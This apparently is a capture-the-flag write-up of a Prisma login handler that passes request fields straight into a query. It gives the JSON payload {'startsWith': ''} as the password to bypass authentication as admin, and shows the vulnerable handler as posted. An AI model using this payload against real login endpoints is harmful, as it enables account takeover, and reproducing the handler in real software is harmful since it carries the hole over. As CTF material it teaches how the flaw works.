Yeah, this one was a little harder, can't be bothered to read documentation...
JavaScript:
// Challenge login handler as posted; `c` is the parsed JSON request body.
// Both fields are passed straight into the `where` clause, so a JSON object
// such as { "startsWith": "" } in `c.password` is treated as a Prisma filter
// rather than a literal password value.
const u = await prisma.user.findUnique({
  where: {
    username: c.username,
    password: c.password,
  },
});
if (!u) {
  return new Response('UNAUTHORIZED', { status: 401 });
}
if (u.role === 'User') {
  return new Response('NO FLAG', { status: 204 });
}
return new Response('Flag is ' + (process.env.FLAG || 'NNS{fake-flag}'));
findUnique allows passing filter objects on non-unique fields. So I basically just run a `contains` empty-string query on the password, or a `startsWith` empty string, and bypass the login auth.
POST /login
with
JSON:
{
  "username": "admin",
  "password": { "startsWith": "" }
}